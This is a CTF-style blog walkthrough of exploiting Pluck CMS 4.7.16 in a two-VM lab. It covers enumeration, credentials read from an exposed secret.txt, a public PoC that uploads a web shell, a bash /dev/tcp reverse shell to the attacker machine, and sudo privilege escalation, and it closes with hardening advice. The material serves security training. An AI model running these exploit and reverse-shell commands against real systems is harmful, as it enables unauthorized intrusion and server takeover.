Pluck CMS 4.7.16 Theme Upload RCE — CTF Walkthrough & Exploit Guide

cybersecuritylearners
Pluck CMS 4.7.16 Theme Upload RCE

This article is a CTF-style, hands-on walkthrough for exploiting Pluck CMS 4.7.16 using a known Theme Upload RCE vulnerability. Pluck CMS is a lightweight open-source content management system. Version 4.7.16 contains a critical vulnerability that allows authenticated users to upload a malicious theme file, enabling complete takeover of the server. This vulnerability is publicly referenced as a Theme Upload RCE exploit.

You will learn how to:
  • Discover the target and enumerate services
  • Find exposed credentials and log in as admin
  • Use a public exploit to upload a web shell
  • Obtain a reverse shell and pivot to the target system
  • Escalate privileges from www-datapluckroot

CTF Step 0 Environment & Setup

For this walkthrough you need Virtual box or VMware along with two VMs in the same network:

  • Attacker: Kali Linux (IP: e.g. 10.0.2.6)
  • Target: Ubuntu VM running Pluck CMS 4.7.16 (IP: e.g. 10.0.2.5)

Ensure the VMs use a Bridged Adapter or NAT so they can communicate.

setup png
setup png
Back to 📚

CTF Step 1 Target discovery & service enumeration

Find the target IP using netdiscover:

sudo netdiscover -r 10.0.2.0/24
netdiscover png
netdiscover png
netdiscover png

Netdiscover results png

Scan the host with nmap to discover open ports and services:

nmap -A -T4 10.0.2.5

Expected result: port 80 open and Apache2 running. Open http://10.0.2.5 in a browser to confirm.

nmap_result png
Apache port_80 png

nmap-results and http://10.0.2.5 png

Directory enumeration

Use ffuf (or dirsearch) to find hidden directories:

ffuf -u http://10.0.2.5/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt

Look for a folder like /pluck which contains the CMS.

Back to 📚

CTF Step 2 Credential discovery (robots.txt / secret files)

Check /robots.txt for disallowed paths:

curl http://10.0.2.5/pluck/robots.txt

Example output may list /data, /docs and /secret.txt. Open secret.txt to find credentials:

admin:global123
secret png

secret.txt png

Login to the Pluck admin panel at http://10.0.2.5/pluck/login.php ,using the discovered credentials.

Back to 📚

CTF Step 3 Exploit: Theme upload → Web shell

Confirm the CMS version (4.7.16)  after login into http://10.0.2.5/pluck/login.php. Search for public exploits (GitHub has an exploit repository for this CVE).

Clone the exploit repo and inspect files:

git clone https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC
cd pluck-exploit
ls -la

Typical files include exploit.py and shell.tar (the payload).

Run the exploit (example syntax — follow README):

python3 exploit.py -u http://10.0.2.5 -U admin -P global123

Successful output:

Authentication successful
Web shell uploaded: http://10.0.2.5/pluck/data/themes/shell/shell.php
webshell png

exploit-output png
Back to 📚

CTF Step 4 Get a reverse shell

Open a netcat listener on the attacker machine:

nc -lvnp 1234

From the web shell interface (or by visiting the uploaded shell in a browser), execute a reverse shell back to the attacker:

bash -c 'bash -i >& /dev/tcp/10.0.2.6/1234 0>&1'

On the listener you should see a connection and get a shell as www-data:

www-data@target:~$ whoami
www-data
reverse shell png

reverse-shell png)
Back to 📚

CTF Step 5 Privilege Escalation — www-datapluck → root

1. Enumerate the file system & users

Start by inspecting the home directories and looking for interesting files in www-data@pluck:/$

cd /home
ls -la

2. Find credentials in hidden files

Look for dotfiles and config snippets. In this CTF, a hidden file exposes the plug user's password:

cat /home/pluck/.viminfo
# contains: keep my password safe: password123

3. Switch to pluck

su pluck
# Enter password: password123
whoami
# pluck

4. Check sudo privileges

Use sudo -S -l to list allowed sudo commands:

sudo -S -l
# (pluck) ALL=(ALL) ALL

Output indicates pluck can run all commands via sudo — a full privilege escalation path.

5. Escalate to root

sudo su
whoami
# root

Now read the root flag:

cat /root/flag.txt

Back to 📚

CTF Step 6 Mitigation & Hardening

Key recommendations to prevent this class of vulnerability:

  • Keep CMS software and plugins up-to-date — apply security patches promptly.
  • Restrict file upload functionality: validate file types, use server-side checks, and store uploads outside the webroot or use strict filename filtering.
  • Harden admin credentials: avoid storing credentials in easily-readable files like /secret.txt or dotfiles.
  • Restrict sudo access: avoid giving users blanket ALL=(ALL) ALL privileges.
  • Reduce attack surface: disable directory listing and remove unnecessary files (e.g., old backup archives) from webroot.
Back to 📚

Conclusion

This CTF-style walkthrough demonstrates a full exploitation chain against Pluck CMS 4.7.16: from discovery and credential harvesting to RCE, reverse shell, and final privilege escalation. Use the steps in a controlled lab environment to practice and learn defensive countermeasures.

Disclaimer: This guide is for educational and authorized CTF / lab use only. Never test exploits against systems you don’t own or have explicit permission to assess.



0 Comments